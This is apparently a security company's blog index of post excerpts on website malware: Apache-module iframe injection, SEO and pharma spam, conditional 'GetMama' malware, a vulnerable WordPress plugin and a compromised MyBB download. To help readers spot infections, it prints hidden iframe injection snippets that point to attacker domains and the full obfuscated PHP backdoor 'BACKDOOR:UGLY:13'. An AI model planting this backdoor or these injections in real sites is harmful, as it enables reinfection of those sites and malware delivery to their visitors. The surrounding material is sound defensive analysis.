Protect Your Interwebs!
Research by Daniel Cid. Authored by Dre Armeda.
One thing you can’t take away from some of the attackers we deal with everyday is their creativity. From time to time we write about new trends we’re seeing, and this post is no different. We’re seeing a new tactic recently, and it may be affecting your pockets, even if you’re not into the latest trend of using digital currency.
There are many ways to inject a malicious payload onto a website. The attacker can modify any of the web files (index.php for example), the .htaccess file or php.ini (if the site is using PHP). There are other ways, but those are the most common methods, specially on shared hosts.
However, for the last year, we started to see a new way to inject malware on compromised servers via a malicious Apache module. We posted about it before and it has been covered on many other mediums. After a few months of tracking them, and working on multiple servers that had this issue, we want to share a bit of what we have learned.
First, a good way to identify if an infection is coming via the Apache module compromise is by looking at how the iframe is being inserted. They seem to always follow this pattern:
<style<.t1nhuhjv { position:absolute; left:-1619px; top:-1270px} </style> <div class=”t1nhuhjv”><iframe
src="httx://qotive. changeip.name/random/" width=”534″ height=”556″> </iframe></div>or
<style>.q6umct6stl { position:absolute; left:-1284px; top:-1774px} </style> <div class="q6umct6stl”><iframe
src="httx://nujifa. longmusic.com/kdqjagzxwbakl/cdce48ffcf125f41206a9ed88675b56b/" width="367" height="411"></iframe></div>
The domain name changes very often (IP is often 62.75.235.48), as does the div class name and the iframe sizes. These are some of the domains we have tracked:
Read More
The most complicated part of our job, when cleaning compromised web sites, is ensuring we find all backdoors. If we miss one, the site can be reinfected. We have done a few posts about backdoors already, explaining how they work and in them provide example of what they are and look like:
However, despite being a very complicated task, most people still think that removing backdoors consist of searching for eval’s, base64_decode and similar keywords. While that will find some, it’s not highly effective.
Today, we will present you the BACKDOOR:UGLY:13 (yes, that’s how we name it). It is a code we are finding on WordPress/Joomla sites compromised with SEO Spam to allow the attackers to reinfect and reinject spam code:
<?php
$P81J5DkwYm=’CQWnk4mSgxD’^apC4zA_i;$Oq9E1Iip7=ouw&’o}=’;$qkit=’&=’.HZ^’IX=+=-’;'nyD’.
‘?’;$ywO_bGCvD=’H]’.pTZYkh.’<G}FC’&hTXXRlZLrO.’[{g';$eBwDr2V=#w50jH83IO7'.
' ,|:F-2>1u@:"'.qgQ1.'<*'^EMR.'"@'.tKU2.'$Ln&)(hkx';$Arb='>8a'^Mb9;'Tpr'.
'rH-AhDxq';$Wt0cI9t='(h9'|'}.}';$ON_=eftg.'/l'|F3FDez;$koJhZ='}'.v.#CF0'.
'.=8l`5'&'RVN]m.l}z^H>’;$QgYL=’ “.’.DAMT.’%#Q’|’ $+(<TH@T-#A’;$GDWkPb=’@*’.
‘%DxM”g#’.HCId.’@^’.ItSA^’xW^sN}@’.OR05.’|Jq./F8|’;$g1MRqXRy=$Oq9E1I&/*_Ikm’.
‘Uv*/$Wt0cI9t;$Db_3w=$ON_&$qkit;$_izus6=$koJhZ^$QgYL;$gMYmjr=(‘@)+G)F”N#2$t’.
‘$p4″W-,’|’0!&c`v!,0>4$OP0 f#p’)^$GDWkPbCn5;$DP7=(’5$ C1=”E+c.’.g27mr.#DfTy’.
‘%!’.r0x66.’<22@5x’|'!4(2rc>`3a?!73 ‘.cH9a.’$`<34(“y+P’)&(‘{jWR%O.%1m^R%-<B’.
‘f?W@[#q{];’.ZpqKKG^’J_!’.VG.’[U9%XZ@}'.YJf5.'&LDF$'.MaFIt.'<p');$niZllS=(#'.
'{/7p"'.fjlb.' =i,'^';os0}>?,Qd{(l')|$_bGCvD;if($g1MRqXRy($Db_3w(/*BZKHhHPA'.
'6X$eO*/$gMYmjrlJc))==$DP7)$_izus6(('=[M{]~o~m}’&'~_W9}>’.iyem),$Db_3w(/*y3′.
‘n*/$niZ),$eBwDr2V.$ArvQhb.(‘lv^9{p’^'”C<T6M’));#medAQT)W(Azd-,JG ?f.Er?2R’.
‘z-YAYBxK:@x#4St%.q+_H5^P(XB|+leP9f-{1f’;
We often talk about the importance of keeping your server clean. You can see it in a number of our articles and presentations, this post will likely drive that point home.
This past week we came across a nice little package that we felt compelled to share with you. In it, the attacker makes use of a number of tools designed to help them infiltrate your environment. What’s likely most annoying about this kit is that it’s loaded into your environment, and uses your own resources to help hack you. That’s like being punched in the gut and slapped at the same time, not cool.
Read More
Some of you might remember my last Pharma hack post, Intelligent (Pharma) SPAM Decoded, today I will spend some time looking a different variant of the same infection type but focus on a payload that is not encoded or embedded within an existing file, instead it resides in its own file – PHP5.php.
“Hmm, maybe it’s a good / system file, it does have PHP in it, I won’t bother looking at it…”
If you have ever come across this file and find yourself thinking this, we highly encourage you not to and take a minute to see if any of its components resemble what we’re about to share.
We have been tracking an interesting malware that is affecting thousands of compromised sites. We call it GetMama!!
Why conditional? Because instead of just displaying the malicious code to all the visitors of the web site, it connects back to its command and control server to find out what to do. It also sends back to the attackers the IP address, user agent and referrer of the person visiting the compromised site, so the command and control can determine if it should display the malicious content or not.
It also only displays the malicious content once a day per IP address and only to Windows users.
Read More
We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.
We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:
Read More
You have heard me write in the past about understanding the true Vulnerability within WordPress. In that post I talk to the benefits of the platform and how those same benefits are also its weakness. This post is an example that brings that point home, specifically about staying diligent with your plugins.
It was recently released that a plugin for WordPress, Deans FCKEditor with PWWANGS Code Plugin for WordPress, was known to contain a very serious vulnerability that gives hackers full control to modify, upload and execute files within your WordPress install (source PacketStorm). This vulnerability is actually not new and was found for version 1.0.0. That’s not the point though, what is, is that this version is in fact vulnerable.
Read More
There is a very prominent backdoor being used extensively across a lot of the sites we are working on these days. This backdoor is giving the attacker[s] full control of your server.
File to be on the look out for:
Once in your environment, it’s replicated and being embedded deep within your file directories making it difficult to detect. It’s important to remove it completely from your server as soon as possible.
Utf8gat is the more popular filename is we’re seeing right now, it’ll most likely evolve with time. If you do not feel comfortable deleting the files, change file permissions to 000 so it can’t be accessed or executed.
Read More
It’s not good when your site gets infected with malware, specially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site hacked and the software download packages compromised:
There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.
The MyBB team recommend these actions:
*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.
Comments